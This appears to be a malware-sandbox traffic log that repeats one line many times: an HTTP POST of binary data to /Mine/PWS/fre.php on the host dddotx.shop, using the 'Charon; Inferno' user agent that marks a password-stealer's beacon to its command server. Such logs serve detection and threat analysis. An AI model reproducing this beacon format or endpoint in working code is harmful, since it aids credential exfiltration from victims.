            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
